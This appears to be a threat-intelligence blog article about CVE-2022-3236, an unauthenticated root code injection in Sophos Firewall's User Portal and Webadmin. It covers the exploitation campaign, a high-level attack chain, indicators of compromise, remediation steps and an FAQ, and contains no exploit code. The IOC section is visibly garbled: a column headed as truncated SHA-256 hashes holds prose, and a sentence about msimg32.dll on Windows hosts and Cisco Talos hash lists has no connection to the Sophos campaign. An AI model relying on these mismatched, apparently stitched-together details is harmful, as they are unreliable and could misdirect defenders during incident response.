CVE-2022-3236: Sophos Firewall Code Injection Zero-Day
A critical unauthenticated code injection in Sophos Firewall's User Portal and Webadmin, exploited as a zero-day by a Chinese APT to intercept network traffic and plant persistent backdoors across South Asian targets
CVE-2022-3236 is a critical unauthenticated code injection vulnerability in the User Portal and Webadmin interfaces of Sophos Firewall (formerly XG Firewall), disclosed in September 2022 and already being exploited as a zero-day at time of disclosure. Volexity's threat research attributed the campaign to a Chinese APT cluster they track as Storm Cloud, which used the vulnerability to achieve root-level code execution on internet-facing firewall appliances in South and Southeast Asian organizations. Post-exploitation activity included traffic interception, credential harvesting, and deployment of persistent backdoors designed to survive standard firmware upgrades.
Vulnerability Details: User Portal and Webadmin Injection
Sophos Firewall (SFOS) exposes two web interfaces: the User Portal (for VPN user self-service, typically accessible from the internet on port 443 or 4444) and Webadmin (the administrative interface). Both process user-supplied HTTP request parameters as part of their functionality.
CVE-2022-3236 exists in a component shared by both interfaces that failed to adequately sanitize certain request parameters before passing them to OS-level functions. An unauthenticated attacker can inject OS commands through these parameters, which execute as root on the underlying Sophos Firewall Linux appliance (SFOS is a hardened Linux distribution).
Root-level RCE on the firewall appliance grants complete control: modification of firewall rules, packet capture of all passing traffic, access to VPN credential stores, and the ability to plant persistence mechanisms at any level of the OS.
Storm Cloud APT Campaign: Backdoors and Traffic Interception
Volexity's investigation revealed a sophisticated multi-stage compromise framework deployed by Storm Cloud following initial CVE-2022-3236 exploitation:
**Asnarök variant**: A modified version of the Asnarök malware family (previously used in the 2020 Sophos XG zero-day campaign) was deployed for persistence. The malware writes to partition locations not covered by standard Sophos integrity checking, surviving firmware upgrades.
**Traffic interception**: Attackers modified iptables rules and deployed packet capture tooling on the compromised firewall to intercept all decrypted traffic passing through it — including VPN sessions, which the firewall terminates and re-encrypts.
**Credential harvesting**: VPN credentials of users authenticating through the compromised appliance were captured from the decrypted traffic stream.
**Lateral movement**: Using harvested credentials, Storm Cloud moved laterally to internal network systems accessible via VPN, deploying Gh0st RAT and the TSTRAT backdoor on Windows endpoints.
Attack Chain
Storm Cloud's exploitation and post-compromise sequence:
Identify Internet-Exposed Management Interface
Scan for Sophos Firewall User Portal or Webadmin interfaces accessible from the internet; common ports are 443 and 4444 depending on configuration.
Unauthenticated Code Injection
Send crafted HTTP request with injected OS commands in vulnerable parameters; commands execute as root on the Sophos Firewall Linux appliance without any authentication.
Asnarök Persistence Installed
Deploy Asnarök-variant backdoor to persistent storage locations outside the standard SFOS integrity check coverage; backdoor survives standard firmware upgrade.
Traffic Interception Enabled
Modify iptables rules and deploy packet capture to intercept all traffic flowing through the firewall, including decrypted VPN sessions and internal communications.
Lateral Movement and RAT Deployment
Use harvested VPN credentials to access internal network; deploy Gh0st RAT and TSTRAT backdoor on internal Windows endpoints for persistent espionage access.
Indicators of Compromise
Known artifacts from CVE-2022-3236 exploitation and the Storm Cloud campaign:
| Artifact | Type | SHA-256 (Truncated) |
|---|---|---|
| Unexpected binary files in /bin/, /usr/bin/, or persistent storage partitions of Sophos Firewall appliance | Filesystem — Sophos Firewall SFOS Linux | Compare installed binaries against Sophos-published firmware manifest; Asnarök variants place binaries in locations outside standard SFOS update coverage |
| Outbound connections from Sophos Firewall to non-Sophos infrastructure on unusual ports | Network telemetry — firewall egress | Firewall appliance making C2 callbacks; Sophos Firewall should communicate only with Sophos update servers and configured partner cloud services |
| Modified iptables rules or unexpected packet capture processes (tcpdump, dumpcap) running on firewall | Process and iptables — Sophos Firewall Linux | Traffic interception tooling planted by Storm Cloud; compare iptables ruleset against baseline configuration |
| Anomalous HTTP requests to User Portal or Webadmin paths with unusual parameter encoding | Sophos Firewall access log | Exploitation attempts visible in SFOS access logs; review logs for requests with encoded OS command characters in parameter values |
Any instance of msimg32.dll found outside C:\Windows\System32 is an active IOC. Isolate the host immediately. Full hashes and IOC lists are available via the Cisco Talos GitHub repository.
Remediation
Steps in order of urgency:
Verify hotfix application and apply manually if needed
Confirm the September 2022 hotfix was applied to all Sophos Firewall devices. Devices on restricted networks without internet connectivity to Sophos update servers did not receive the automatic hotfix. Check SFOS version and hotfix status in the admin interface; apply the manual hotfix package for affected versions following Sophos KB-000045839.
Restrict internet access to User Portal and Webadmin
Management interfaces should not be directly internet-accessible. Immediately restrict access to trusted source IPs only, or place management interfaces behind a VPN requirement. This eliminates the attack surface for unauthenticated exploitation of this and future Sophos Firewall vulnerabilities.
Audit the firewall filesystem for unauthorized modifications
If the device was internet-exposed before hotfix application, compare all installed binaries and scripts against the Sophos-published SFOS manifest for the installed version. Unexpected binaries or modifications to startup scripts indicate compromise.
Factory reset if compromise is confirmed or suspected
Volexity confirmed that Asnarök-variant backdoors survive standard firmware upgrades by writing to unmonitored persistent storage partitions. If compromise is suspected, the only reliable remediation is a factory reset to a verified clean base image followed by applying the current patched SFOS firmware before reconnecting to the network.
Rotate VPN credentials and review internal access
If the firewall was compromised, all VPN credentials of users who authenticated during the compromise window should be considered exposed and must be rotated. Review internal network logs for lateral movement originating from IP addresses within the VPN segment.
The bottom line
CVE-2022-3236 is the third Sophos Firewall zero-day attributed to Chinese APT actors within two years — preceded by CVE-2020-12271 in 2020 and CVE-2022-1040 earlier in 2022. This pattern indicates persistent, dedicated vulnerability research into Sophos Firewall products by well-resourced threat actors who consider the platform a high-value intelligence access point. Organizations using Sophos Firewall must treat management interface isolation as a critical architectural requirement, not an optional hardening measure, and should apply patches with the same urgency applied to any internet-facing perimeter device.
Frequently asked questions
Is CVE-2022-3236 the same as the 2020 Sophos XG Firewall zero-day?
No. The 2020 campaign exploited CVE-2020-12271 (SQL injection RCE via a different attack surface). CVE-2022-3236 is a separate code injection vulnerability. However, both campaigns deployed variants of the Asnarök malware and share infrastructure patterns consistent with the same Chinese APT cluster, suggesting persistent research investment in Sophos Firewall exploitation.
Did the automatic Sophos hotfix protect all customers?
No. Sophos's automatic hotfix delivery requires outbound internet connectivity from the firewall to Sophos update servers. Devices on air-gapped networks or with restricted outbound connectivity did not receive the automatic update and required manual hotfix installation — a gap that left many enterprise deployments exposed beyond the initial patch window.
Should we consider a factory reset even after applying the hotfix?
Yes, if your device was internet-exposed before the hotfix was applied. Volexity's research confirmed that the Asnarök-variant malware deployed by Storm Cloud modifies the Sophos Firewall Linux base in ways that survive standard firmware upgrades. A factory reset to a verified clean base image followed by the current patched firmware is the only reliable remediation if compromise is suspected.
Sources & references
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.